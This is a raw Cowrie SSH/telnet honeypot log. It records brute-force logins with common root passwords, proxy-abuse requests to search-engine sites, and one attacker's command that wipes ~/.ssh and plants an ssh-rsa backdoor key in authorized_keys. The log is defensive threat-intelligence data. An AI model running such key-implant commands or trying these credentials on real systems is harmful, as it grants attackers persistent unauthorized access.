{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:15:34.813926Z","src_ip":"212.227.235.229","session":"2c84dde52f4d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:15:34.926188Z","src_ip":"212.227.235.229","session":"2c84dde52f4d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:15:35.415923Z","src_ip":"212.227.235.229","session":"2c84dde52f4d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:15:35.530806Z","src_ip":"212.227.235.229","session":"2c84dde52f4d"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:15:35.531905Z","src_ip":"212.227.235.229","session":"d9b0f7c0b795"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58536,"dst_ip":"1.2.3.4","dst_port":22,"session":"c86f1f3ba072","protocol":"ssh","message":"New connection: 212.227.235.229:58536 (1.2.3.4:22) [session: c86f1f3ba072]","sensor":"my-vps","timestamp":"2025-08-26T15:16:05.279646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:16:05.280587Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:16:05.582164Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.login.success","username":"root","password":"linux@2025","message":"login attempt [root/linux@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:16:06.829623Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:16:07.452986Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:16:07.453688Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:16:07.454880Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:16:07.758093Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:16:08.478338Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:16:08.479067Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:16:08.783503Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:16:08.784363Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59494,"dst_ip":"1.2.3.4","dst_port":22,"session":"4beeb3e6dcb7","protocol":"ssh","message":"New connection: 212.227.235.229:59494 (1.2.3.4:22) [session: 4beeb3e6dcb7]","sensor":"my-vps","timestamp":"2025-08-26T15:16:09.177530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:16:09.178401Z","src_ip":"212.227.235.229","session":"4beeb3e6dcb7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:16:09.527419Z","src_ip":"212.227.235.229","session":"4beeb3e6dcb7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:16:10.966515Z","src_ip":"212.227.235.229","session":"4beeb3e6dcb7"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:16:12.318414Z","src_ip":"212.227.235.229","session":"4beeb3e6dcb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60346,"dst_ip":"1.2.3.4","dst_port":22,"session":"71a9ec829c59","protocol":"ssh","message":"New connection: 212.227.235.229:60346 (1.2.3.4:22) [session: 71a9ec829c59]","sensor":"my-vps","timestamp":"2025-08-26T15:16:12.669188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:16:12.670090Z","src_ip":"212.227.235.229","session":"71a9ec829c59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:16:13.018129Z","src_ip":"212.227.235.229","session":"71a9ec829c59"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:16:14.450866Z","src_ip":"212.227.235.229","session":"71a9ec829c59"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:16:14.750830Z","src_ip":"212.227.235.229","session":"c86f1f3ba072"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:16:14.800301Z","src_ip":"212.227.235.229","session":"71a9ec829c59"}
{"eventid":"cowrie.session.closed","duration":"109.1","message":"Connection lost after 109.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:16:23.771055Z","src_ip":"212.227.125.160","session":"470bd24735dd"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54896,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5a1279b7abb","protocol":"ssh","message":"New connection: 217.72.205.35:54896 (1.2.3.4:22) [session: b5a1279b7abb]","sensor":"my-vps","timestamp":"2025-08-26T15:16:56.620291Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:16:56.621384Z","src_ip":"217.72.205.35","session":"b5a1279b7abb"}
{"eventid":"cowrie.session.connect","src_ip":"107.189.19.100","src_port":60487,"dst_ip":"1.2.3.4","dst_port":22,"session":"29983787b652","protocol":"ssh","message":"New connection: 107.189.19.100:60487 (1.2.3.4:22) [session: 29983787b652]","sensor":"my-vps","timestamp":"2025-08-26T15:18:01.323378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:18:04.241644Z","src_ip":"107.189.19.100","session":"29983787b652"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35698,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f90c44731e6","protocol":"telnet","message":"New connection: 212.227.125.160:35698 (1.2.3.4:23) [session: 1f90c44731e6]","sensor":"my-vps","timestamp":"2025-08-26T15:18:06.672793Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:18:06.754507Z","src_ip":"212.227.125.160","session":"1f90c44731e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:18:06.839263Z","src_ip":"212.227.125.160","session":"1f90c44731e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:18:06.840376Z","src_ip":"107.189.19.100","session":"29983787b652"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei@123","message":"login attempt [root/Huawei@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:18:23.376716Z","src_ip":"107.189.19.100","session":"29983787b652"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51250,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa68f5489a64","protocol":"telnet","message":"New connection: 212.227.125.160:51250 (1.2.3.4:23) [session: fa68f5489a64]","sensor":"my-vps","timestamp":"2025-08-26T15:18:30.179037Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:18:50.423793Z","src_ip":"107.189.19.100","session":"29983787b652"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T15:18:50.424603Z","src_ip":"107.189.19.100","session":"29983787b652"}
{"eventid":"cowrie.session.closed","duration":31.21596336364746,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:19:01.394932Z","src_ip":"212.227.125.160","session":"fa68f5489a64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50834,"dst_ip":"1.2.3.4","dst_port":23,"session":"44089f541598","protocol":"telnet","message":"New connection: 212.227.235.229:50834 (1.2.3.4:23) [session: 44089f541598]","sensor":"my-vps","timestamp":"2025-08-26T15:19:04.806884Z"}
{"eventid":"cowrie.session.closed","duration":14.684327602386475,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:19:19.491113Z","src_ip":"212.227.235.229","session":"44089f541598"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"31.2","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 31.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:19:21.626756Z","src_ip":"107.189.19.100","session":"29983787b652"}
{"eventid":"cowrie.session.closed","duration":"91.5","message":"Connection lost after 91.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:19:32.829264Z","src_ip":"107.189.19.100","session":"29983787b652"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60444,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d67d16020f0","protocol":"telnet","message":"New connection: 212.227.235.229:60444 (1.2.3.4:23) [session: 3d67d16020f0]","sensor":"my-vps","timestamp":"2025-08-26T15:20:04.757310Z"}
{"eventid":"cowrie.session.closed","duration":14.19883394241333,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:20:18.956071Z","src_ip":"212.227.235.229","session":"3d67d16020f0"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":23570,"dst_ip":"1.2.3.4","dst_port":22,"session":"b14d92b4097c","protocol":"ssh","message":"New connection: 185.246.128.133:23570 (1.2.3.4:22) [session: b14d92b4097c]","sensor":"my-vps","timestamp":"2025-08-26T15:20:20.087689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-WinSCP_release_5.7.5","message":"Remote SSH version: SSH-2.0-WinSCP_release_5.7.5","sensor":"my-vps","timestamp":"2025-08-26T15:20:20.088350Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-26T15:20:20.133146Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.027824Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":6324,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:6324","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.073807Z","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.118630Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":8596,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:8596","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.251016Z","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.295803Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":10020,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:10020","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.426998Z","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.471797Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"185.246.128.133","src_port":26327,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26327","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.603342Z","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.648260Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"77.88.44.55","dst_port":80,"src_ip":"185.246.128.133","src_port":7514,"message":"direct-tcp connection request to 77.88.44.55:80 from 127.0.0.1:7514","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.779393Z","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"77.88.44.55","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 77.88.44.55:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.824172Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a02:6b8:a::a","dst_port":80,"src_ip":"185.246.128.133","src_port":15761,"message":"direct-tcp connection request to 2a02:6b8:a::a:80 from 127.0.0.1:15761","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.955058Z","session":"b14d92b4097c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a02:6b8:a::a","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2a02:6b8:a::a:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:20:21.999683Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
